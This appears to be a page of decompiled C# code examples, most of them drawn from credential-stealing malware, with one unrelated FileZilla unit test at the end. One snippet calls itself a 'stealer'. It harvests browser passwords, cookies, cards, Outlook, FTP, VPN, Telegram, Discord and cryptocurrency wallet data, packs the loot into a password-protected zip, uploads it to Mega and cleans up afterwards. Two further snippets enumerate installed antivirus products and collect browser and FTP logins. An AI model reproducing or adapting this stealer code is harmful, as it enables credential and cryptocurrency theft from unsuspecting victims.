                "</p>\n<h2 style=\"color:white\">\ud83d\udd0c VPN</h2>\n<p style=\"color:white\">   ∟ NordVPN: ",
                (NordVPN.count > 0) ? "✅" : "❌",
                "</p>\n<p style=\"color:white\">   ∟ OpenVPN: ",
                (OpenVPN.count > 0) ? "✅" : "❌",
                "</p>\n<p style=\"color:white\">   ∟ ProtonVPN: ",
                (ProtonVPN.count > 0) ? "✅" : "❌",
                "</p>\n<p style=\"color:white\">\ud83c\udd94 HWID: ",
                Help.HWID,
                "</p>\n<p style=\"color:white\">⚙️ ",
                Systemsinfo.GetOSInformation(),
                "</p>\n<p style=\"color:white\">\ud83d\udd0e ",
                File.ReadAllText(Help.Browsers + "\\DomainDetect.txt"),
                "</p>\n</center>\n</body>\n</html>"
            });

            File.WriteAllText(Help.collectionDir + "\\InfoHERE.html", contents);
            Console.WriteLine("Упаковка архива");
            string text = string.Concat(new string[]
            {
                Help.dir,
                "\\",
                Help.userName,
                "_",
                Help.machineName,
                Help.CountryCOde(),
                ".zip"
            });

            using (ZipFile zipFile = new ZipFile(Encoding.GetEncoding("cp866")))
            {
                zipFile.ParallelDeflateThreshold = -1L;
                zipFile.UseZip64WhenSaving       = Zip64Option.Always;
                zipFile.CompressionLevel         = CompressionLevel.Default;
                zipFile.AddDirectory(Help.collectionDir);
                zipFile.Save(text);
            }
            Console.WriteLine("Залив на мегу");
            MegaSend.TaskUpl(text);
            Clean.GetClean();
        }
Exemplo n.º 16
0
        // Token: 0x06000006 RID: 6 RVA: 0x000022D4 File Offset: 0x000004D4
        public static void GetCollection()
        {
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals1 = new Collection.< > c__DisplayClass2_0();
            Console.ForegroundColor = ConsoleColor.White;
            Console.WriteLine("Если вы это видите, значит запуск происходит в консольном режиме. Не забудьте перекомпилировать стиллер как 'Приложение Windows'.");
            Console.WriteLine("If you see this, then the launch is in console mode. Do not forget to recompile the stealer as a 'Windows application'.");
            try
            {
                Directory.CreateDirectory(Help.collectionDir);
                Directory.CreateDirectory(Help.Browsers);
                Directory.CreateDirectory(Help.Passwords);
                Directory.CreateDirectory(Help.Autofills);
                Directory.CreateDirectory(Help.Downloads);
                Directory.CreateDirectory(Help.Cookies);
                Directory.CreateDirectory(Help.History);
                Directory.CreateDirectory(Help.Cards);
            }
            catch
            {
            }
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals2 = CS$ < > 8__locals1;
            Task[] array = new Task[1];
            array[0] = new Task(delegate()
            {
                Files.GetFiles(Help.collectionDir);
            });
            CS$ < > 8__locals2.t0 = array;
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals3 = CS$ < > 8__locals1;
            Task[] array2 = new Task[1];
            array2[0] = new Task(delegate()
            {
                Collection.GetChromium();
            });
            CS$ < > 8__locals3.t1 = array2;
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals4 = CS$ < > 8__locals1;
            Task[] array3 = new Task[1];
            array3[0] = new Task(delegate()
            {
                Collection.GetGecko();
            });
            CS$ < > 8__locals4.t2 = array3;
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals5 = CS$ < > 8__locals1;
            Task[] array4 = new Task[1];
            array4[0] = new Task(delegate()
            {
                Edge.GetEdge(Help.Passwords);
            });
            CS$ < > 8__locals5.t3 = array4;
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals6 = CS$ < > 8__locals1;
            Task[] array5 = new Task[1];
            array5[0] = new Task(delegate()
            {
                Outlook.GrabOutlook(Help.collectionDir);
            });
            CS$ < > 8__locals6.t4 = array5;
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals7 = CS$ < > 8__locals1;
            Task[] array6 = new Task[1];
            array6[0] = new Task(delegate()
            {
                FileZilla.GetFileZilla(Help.collectionDir);
            });
            CS$ < > 8__locals7.t5 = array6;
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals8 = CS$ < > 8__locals1;
            Task[] array7 = new Task[1];
            array7[0] = new Task(delegate()
            {
                TotalCommander.GetTotalCommander(Help.collectionDir);
            });
            CS$ < > 8__locals8.t6 = array7;
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals9 = CS$ < > 8__locals1;
            Task[] array8 = new Task[1];
            array8[0] = new Task(delegate()
            {
                ProtonVPN.GetProtonVPN(Help.collectionDir);
            });
            CS$ < > 8__locals9.t7 = array8;
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals10 = CS$ < > 8__locals1;
            Task[] array9 = new Task[1];
            array9[0] = new Task(delegate()
            {
                OpenVPN.GetOpenVPN(Help.collectionDir);
            });
            CS$ < > 8__locals10.t8 = array9;
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals11 = CS$ < > 8__locals1;
            Task[] array10 = new Task[1];
            array10[0] = new Task(delegate()
            {
                NordVPN.GetNordVPN(Help.collectionDir);
            });
            CS$ < > 8__locals11.t9 = array10;
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals12 = CS$ < > 8__locals1;
            Task[] array11 = new Task[1];
            array11[0] = new Task(delegate()
            {
                Telegram.GetTelegram(Help.collectionDir);
            });
            CS$ < > 8__locals12.t10 = array11;
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals13 = CS$ < > 8__locals1;
            Task[] array12 = new Task[1];
            array12[0] = new Task(delegate()
            {
                Discord.GetDiscord(Help.collectionDir);
            });
            CS$ < > 8__locals13.t11 = array12;
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals14 = CS$ < > 8__locals1;
            Task[] array13 = new Task[1];
            array13[0] = new Task(delegate()
            {
                Wallets.GetWallets(Help.collectionDir);
            });
            CS$ < > 8__locals14.t12 = array13;
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals15 = CS$ < > 8__locals1;
            Task[] array14 = new Task[1];
            array14[0] = new Task(delegate()
            {
                Systemsinfo.GetSystemsData(Help.collectionDir);
            });
            CS$ < > 8__locals15.t13 = array14;
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals16 = CS$ < > 8__locals1;
            Task[] array15 = new Task[1];
            array15[0] = new Task(delegate()
            {
                DomainDetect.GetDomainDetect(Help.Browsers);
            });
            CS$ < > 8__locals16.t14 = array15;
            Collection.< > c__DisplayClass2_0 CS$ < > 8__locals17 = CS$ < > 8__locals1;
            Task[] array16 = new Task[1];
            array16[0] = new Task(delegate()
            {
                Dec.Decrypt(Help.Passwords);
            });
            CS$ < > 8__locals17.t15 = array16;
            try
            {
                new Thread(delegate()
                {
                    Task[] t = CS$ < > 8__locals1.t0;
                    for (int i = 0; i < t.Length; i++)
                    {
                        t[i].Start();
                    }
                }).Start();
                new Thread(delegate()
                {
                    Task[] t = CS$ < > 8__locals1.t1;
                    for (int i = 0; i < t.Length; i++)
                    {
                        t[i].Start();
                    }
                }).Start();
                new Thread(delegate()
                {
                    Task[] t = CS$ < > 8__locals1.t2;
                    for (int i = 0; i < t.Length; i++)
                    {
                        t[i].Start();
                    }
                }).Start();
                new Thread(delegate()
                {
                    Task[] t = CS$ < > 8__locals1.t3;
                    for (int i = 0; i < t.Length; i++)
                    {
                        t[i].Start();
                    }
                }).Start();
                new Thread(delegate()
                {
                    Task[] t = CS$ < > 8__locals1.t4;
                    for (int i = 0; i < t.Length; i++)
                    {
                        t[i].Start();
                    }
                }).Start();
                new Thread(delegate()
                {
                    Task[] t = CS$ < > 8__locals1.t5;
                    for (int i = 0; i < t.Length; i++)
                    {
                        t[i].Start();
                    }
                }).Start();
                new Thread(delegate()
                {
                    Task[] t = CS$ < > 8__locals1.t6;
                    for (int i = 0; i < t.Length; i++)
                    {
                        t[i].Start();
                    }
                }).Start();
                new Thread(delegate()
                {
                    Task[] t = CS$ < > 8__locals1.t7;
                    for (int i = 0; i < t.Length; i++)
                    {
                        t[i].Start();
                    }
                }).Start();
                new Thread(delegate()
                {
                    Task[] t = CS$ < > 8__locals1.t8;
                    for (int i = 0; i < t.Length; i++)
                    {
                        t[i].Start();
                    }
                }).Start();
                new Thread(delegate()
                {
                    Task[] t = CS$ < > 8__locals1.t9;
                    for (int i = 0; i < t.Length; i++)
                    {
                        t[i].Start();
                    }
                }).Start();
                new Thread(delegate()
                {
                    Task[] t = CS$ < > 8__locals1.t10;
                    for (int i = 0; i < t.Length; i++)
                    {
                        t[i].Start();
                    }
                }).Start();
                new Thread(delegate()
                {
                    Task[] t = CS$ < > 8__locals1.t11;
                    for (int i = 0; i < t.Length; i++)
                    {
                        t[i].Start();
                    }
                }).Start();
                new Thread(delegate()
                {
                    Task[] t = CS$ < > 8__locals1.t12;
                    for (int i = 0; i < t.Length; i++)
                    {
                        t[i].Start();
                    }
                }).Start();
                new Thread(delegate()
                {
                    Task[] t = CS$ < > 8__locals1.t13;
                    for (int i = 0; i < t.Length; i++)
                    {
                        t[i].Start();
                    }
                }).Start();
                new Thread(delegate()
                {
                    Task[] t = CS$ < > 8__locals1.t14;
                    for (int i = 0; i < t.Length; i++)
                    {
                        t[i].Start();
                    }
                }).Start();
                new Thread(delegate()
                {
                    Task[] t = CS$ < > 8__locals1.t15;
                    for (int i = 0; i < t.Length; i++)
                    {
                        t[i].Start();
                    }
                }).Start();
                Task.WaitAll(CS$ < > 8__locals1.t0);
                Task.WaitAll(CS$ < > 8__locals1.t1);
                Task.WaitAll(CS$ < > 8__locals1.t2);
                Task.WaitAll(CS$ < > 8__locals1.t3);
                Task.WaitAll(CS$ < > 8__locals1.t4);
                Task.WaitAll(CS$ < > 8__locals1.t5);
                Task.WaitAll(CS$ < > 8__locals1.t6);
                Task.WaitAll(CS$ < > 8__locals1.t7);
                Task.WaitAll(CS$ < > 8__locals1.t8);
                Task.WaitAll(CS$ < > 8__locals1.t9);
                Task.WaitAll(CS$ < > 8__locals1.t10);
                Task.WaitAll(CS$ < > 8__locals1.t11);
                Task.WaitAll(CS$ < > 8__locals1.t12);
                Task.WaitAll(CS$ < > 8__locals1.t13);
                Task.WaitAll(CS$ < > 8__locals1.t14);
                Task.WaitAll(CS$ < > 8__locals1.t15);
            }
            catch
            {
            }
            string contents = string.Concat(new string[]
            {
                JsonValue.buildversion,
                "\n\ud83d\udc64 ",
                Help.machineName,
                "/",
                Help.userName,
                "\n\ud83c\udff4 IP: ",
                Help.IP(),
                Help.Country(),
                "\n\ud83c\udf10 Browsers Data\n   ∟\ud83d\udd11\n     ∟Chromium v1: ",
                Chromium.Passwords.ToString(),
                "\n     ∟Chromium v2: ",
                Dec.colvo.ToString(),
                "\n     ∟Edge: ",
                Edge.count.ToString(),
                "\n     ∟Gecko: ",
                Steal.count.ToString(),
                "\n   ∟\ud83c\udf6a",
                (Chromium.Cookies + Steal.count_cookies).ToString(),
                "\n   ∟\ud83d\udd51",
                Chromium.History.ToString(),
                "\n   ∟\ud83d\udcdd",
                Chromium.Autofills.ToString(),
                "\n   ∟\ud83d\udcb3",
                Chromium.CC.ToString(),
                "\n   ∟⨭",
                Chromium.Downloads.ToString(),
                "\n\ud83d\udcb6 Wallets: ",
                (Wallets.count > 0) ? "✅" : "❌",
                (Electrum.count > 0) ? " Electrum" : "",
                (Armory.count > 0) ? " Armory" : "",
                (AtomicWallet.count > 0) ? " Atomic" : "",
                (BitcoinCore.count > 0) ? " BitcoinCore" : "",
                (Bytecoin.count > 0) ? " Bytecoin" : "",
                (DashCore.count > 0) ? " DashCore" : "",
                (Ethereum.count > 0) ? " Ethereum" : "",
                (Exodus.count > 0) ? " Exodus" : "",
                (LitecoinCore.count > 0) ? " LitecoinCore" : "",
                (Monero.count > 0) ? " Monero" : "",
                (Zcash.count > 0) ? " Zcash" : "",
                (Jaxx.count > 0) ? " Jaxx" : "",
                "\n\ud83d\udcc2 FileGrabber: ",
                Files.count.ToString(),
                "\n\ud83d\udcac Discord: ",
                (Discord.count > 0) ? "✅" : "❌",
                "\n✈️ Telegram: ",
                (Telegram.count > 0) ? "✅" : "❌",
                "\n\ud83d\udca1 Jabber: ",
                (Startjabbers.count + Pidgin.PidginCount > 0) ? "✅" : "❌",
                (Pidgin.PidginCount > 0) ? (" Pidgin (" + Pidgin.PidginAkks.ToString() + ")") : "",
                (Startjabbers.count > 0) ? " Psi" : "",
                "\n\ud83d\udce1 FTP\n   ∟ FileZilla: ",
                (FileZilla.count > 0) ? ("✅ (" + FileZilla.count.ToString() + ")") : "❌",
                "\n   ∟ TotalCmd: ",
                (TotalCommander.count > 0) ? "✅" : "❌",
                "\n\ud83d\udd0c VPN\n   ∟ NordVPN: ",
                (NordVPN.count > 0) ? "✅" : "❌",
                "\n   ∟ OpenVPN: ",
                (OpenVPN.count > 0) ? "✅" : "❌",
                "\n   ∟ ProtonVPN: ",
                (ProtonVPN.count > 0) ? "✅" : "❌",
                "\n\ud83c\udd94 HWID: ",
                Help.HWID,
                "\n⚙️ ",
                Systemsinfo.GetOSInformation(),
                "\n\ud83d\udd0e ",
                File.ReadAllText(Help.Browsers + "\\DomainDetect.txt")
            });

            File.WriteAllText(Help.collectionDir + "\\InfoHERE.txt", contents);
            Console.ForegroundColor = ConsoleColor.Green;
            Console.WriteLine("Упаковка архива");
            string text = string.Concat(new string[]
            {
                Help.dir,
                "\\",
                Help.userName,
                "_",
                Help.machineName,
                Help.CountryCOde(),
                ".zip"
            });

            using (ZipFile zipFile = new ZipFile(Encoding.GetEncoding("cp866")))
            {
                zipFile.ParallelDeflateThreshold = -1L;
                zipFile.UseZip64WhenSaving       = Zip64Option.Always;
                zipFile.CompressionLevel         = CompressionLevel.Default;
                zipFile.Password = Program.passwordzip;
                zipFile.AddDirectory(Help.collectionDir);
                try
                {
                    zipFile.Save(text);
                }
                catch
                {
                    text = Help.dir + "\\" + Help.HWID + ".zip";
                    zipFile.Save(text);
                }
            }
            Console.WriteLine("Залив на мегу");
            MegaSend.Send(text);
            Clean.GetClean();
        }
Exemplo n.º 17
0
        public static Credentials Create(ClientSettings settings)
        {
            Credentials credentials = new Credentials
            {
                Browsers           = new List <Browser>(),
                Files              = new List <RemoteFile>(),
                FtpConnections     = new List <LoginPair>(),
                Hardwares          = new List <Hardware>(),
                InstalledBrowsers  = new List <InstalledBrowserInfo>(),
                InstalledSoftwares = new List <string>(),
                Languages          = new List <string>(),
                Processes          = new List <string>(),
                Defenders          = new List <string>()
            };

            try
            {
                WmiService wmiService = new WmiService();
                try
                {
                    ReadOnlyCollection <WmiProcessor> source = wmiService.QueryAll <WmiProcessor>(new WmiProcessorQuery());
                    credentials.Hardwares = source.Select((WmiProcessor x) => new Hardware
                    {
                        Caption   = x.Name,
                        HardType  = HardwareType.Processor,
                        Parameter = $"{x.NumberOfCores}"
                    }).ToList();
                }
                catch
                {
                }
                try
                {
                    if (credentials.Hardwares == null)
                    {
                        credentials.Hardwares = new List <Hardware>();
                    }
                    foreach (Hardware item in (from x in wmiService.QueryAll <WmiGraphicCard>(new WmiGraphicCardQuery())
                                               where x.AdapterRAM != 0
                                               select new Hardware
                    {
                        Caption = x.Name,
                        HardType = HardwareType.Graphic,
                        Parameter = $"{x.AdapterRAM}"
                    }).ToList())
                    {
                        credentials.Hardwares.Add(item);
                    }
                }
                catch
                {
                }
                try
                {
                    List <WmiQueryBase> list = new List <WmiQueryBase>
                    {
                        new WmiAntivirusQuery(),
                        new WmiAntiSpyWareQuery(),
                        new WmiFirewallQuery()
                    };
                    string[] array = new string[2]
                    {
                        "ROOT\\SecurityCenter2",
                        "ROOT\\SecurityCenter"
                    };
                    List <WmiAntivirus> list2 = new List <WmiAntivirus>();
                    foreach (WmiQueryBase item2 in list)
                    {
                        string[] array2 = array;
                        foreach (string scope in array2)
                        {
                            try
                            {
                                list2.AddRange(wmiService.QueryAll <WmiAntivirus>(item2, new ManagementObjectSearcher(scope, string.Empty)).ToList());
                            }
                            catch
                            {
                            }
                        }
                    }
                    credentials.Defenders = list2.Select((WmiAntivirus x) => x.DisplayName).Distinct().ToList();
                }
                catch
                {
                }
                credentials.InstalledBrowsers  = UserInfoHelper.GetBrowsers();
                credentials.Processes          = UserInfoHelper.ListOfProcesses();
                credentials.InstalledSoftwares = UserInfoHelper.ListOfPrograms();
                credentials.Languages          = UserInfoHelper.AvailableLanguages();
                if (settings.GrabBrowsers)
                {
                    List <Browser> list3 = new List <Browser>();
                    list3.AddRange(ChromiumEngine.ParseBrowsers());
                    list3.AddRange(GeckoEngine.ParseBrowsers());
                    list3.Add(EdgeEngine.ParseBrowsers());
                    foreach (Browser item3 in list3)
                    {
                        if (!item3.IsEmpty())
                        {
                            credentials.Browsers.Add(item3);
                        }
                    }
                }
                if (settings.GrabFiles)
                {
                    credentials.Files = RemoteFileGrabber.ParseFiles(settings.GrabPaths);
                }
                if (settings.GrabFTP)
                {
                    List <LoginPair> list4 = new List <LoginPair>();
                    list4.AddRange(FileZilla.ParseConnections());
                    list4.AddRange(WinSCP.ParseConnections());
                    credentials.FtpConnections = list4;
                }
                if (settings.GrabImClients)
                {
                    foreach (LoginPair item4 in Pidgin.ParseConnections())
                    {
                        credentials.FtpConnections.Add(item4);
                    }
                    return(credentials);
                }
                return(credentials);
            }
            catch
            {
                return(credentials);
            }
        }
Exemplo n.º 18
0
        public static Credentials Create(ClientSettings settings)
        {
            Credentials credentials = new Credentials()
            {
                Browsers           = (IList <Browser>) new List <Browser>(),
                Files              = (IList <RemoteFile>) new List <RemoteFile>(),
                FtpConnections     = (IList <LoginPair>) new List <LoginPair>(),
                Hardwares          = (IList <Hardware>) new List <Hardware>(),
                InstalledBrowsers  = (IList <InstalledBrowserInfo>) new List <InstalledBrowserInfo>(),
                InstalledSoftwares = (IList <string>) new List <string>(),
                Languages          = (IList <string>) new List <string>(),
                Processes          = (IList <string>) new List <string>(),
                Defenders          = (IList <string>) new List <string>()
            };

            try
            {
                WmiService wmiService = new WmiService();
                try
                {
                    ReadOnlyCollection <WmiProcessor> source = wmiService.QueryAll <WmiProcessor>((WmiQueryBase) new WmiProcessorQuery(), (ManagementObjectSearcher)null);
                    credentials.Hardwares = (IList <Hardware>)source.Select <WmiProcessor, Hardware>((Func <WmiProcessor, Hardware>)(x => new Hardware()
                    {
                        Caption   = x.Name,
                        HardType  = HardwareType.Processor,
                        Parameter = string.Format("{0}", (object)x.NumberOfCores)
                    })).ToList <Hardware>();
                }
                catch
                {
                }
                try
                {
                    if (credentials.Hardwares == null)
                    {
                        credentials.Hardwares = (IList <Hardware>) new List <Hardware>();
                    }
                    foreach (Hardware hardware in wmiService.QueryAll <WmiGraphicCard>((WmiQueryBase) new WmiGraphicCardQuery(), (ManagementObjectSearcher)null).Where <WmiGraphicCard>((Func <WmiGraphicCard, bool>)(x => x.AdapterRAM > 0U)).Select <WmiGraphicCard, Hardware>((Func <WmiGraphicCard, Hardware>)(x => new Hardware()
                    {
                        Caption = x.Name,
                        HardType = HardwareType.Graphic,
                        Parameter = string.Format("{0}", (object)x.AdapterRAM)
                    })).ToList <Hardware>())
                    {
                        credentials.Hardwares.Add(hardware);
                    }
                }
                catch
                {
                }
                try
                {
                    List <WmiQueryBase> wmiQueryBaseList = new List <WmiQueryBase>()
                    {
                        (WmiQueryBase) new WmiAntivirusQuery(),
                        (WmiQueryBase) new WmiAntiSpyWareQuery(),
                        (WmiQueryBase) new WmiFirewallQuery()
                    };
                    string[] strArray = new string[2]
                    {
                        "ROOT\\SecurityCenter2",
                        "ROOT\\SecurityCenter"
                    };
                    List <WmiAntivirus> source = new List <WmiAntivirus>();
                    foreach (WmiQueryBase wmiQuery in wmiQueryBaseList)
                    {
                        foreach (string scope in strArray)
                        {
                            try
                            {
                                source.AddRange((IEnumerable <WmiAntivirus>)wmiService.QueryAll <WmiAntivirus>(wmiQuery, new ManagementObjectSearcher(scope, string.Empty)).ToList <WmiAntivirus>());
                            }
                            catch
                            {
                            }
                        }
                    }
                    credentials.Defenders = (IList <string>)source.Select <WmiAntivirus, string>((Func <WmiAntivirus, string>)(x => x.DisplayName)).Distinct <string>().ToList <string>();
                }
                catch
                {
                }
                credentials.InstalledBrowsers  = (IList <InstalledBrowserInfo>)UserInfoHelper.GetBrowsers();
                credentials.Processes          = (IList <string>)UserInfoHelper.ListOfProcesses();
                credentials.InstalledSoftwares = (IList <string>)UserInfoHelper.ListOfPrograms();
                credentials.Languages          = (IList <string>)UserInfoHelper.AvailableLanguages();
                if (settings.GrabBrowsers)
                {
                    List <Browser> browserList = new List <Browser>();
                    browserList.AddRange((IEnumerable <Browser>)ChromiumEngine.ParseBrowsers());
                    browserList.AddRange((IEnumerable <Browser>)GeckoEngine.ParseBrowsers());
                    browserList.Add(EdgeEngine.ParseBrowsers());
                    foreach (Browser browser in browserList)
                    {
                        if (!browser.IsEmpty())
                        {
                            credentials.Browsers.Add(browser);
                        }
                    }
                }
                if (settings.GrabFiles)
                {
                    credentials.Files = RemoteFileGrabber.ParseFiles((IEnumerable <string>)settings.GrabPaths);
                }
                if (settings.GrabFTP)
                {
                    List <LoginPair> loginPairList = new List <LoginPair>();
                    loginPairList.AddRange((IEnumerable <LoginPair>)FileZilla.ParseConnections());
                    loginPairList.AddRange((IEnumerable <LoginPair>)WinSCP.ParseConnections());
                    credentials.FtpConnections = (IList <LoginPair>)loginPairList;
                }
                if (settings.GrabImClients)
                {
                    foreach (LoginPair connection in Pidgin.ParseConnections())
                    {
                        credentials.FtpConnections.Add(connection);
                    }
                }
            }
            catch
            {
            }
            return(credentials);
        }
Exemplo n.º 19
0
        public void Test_implementsSearchForNewer()
        {
            var fz = new FileZilla(false);

            Assert.IsTrue(fz.implementsSearchForNewer());
        }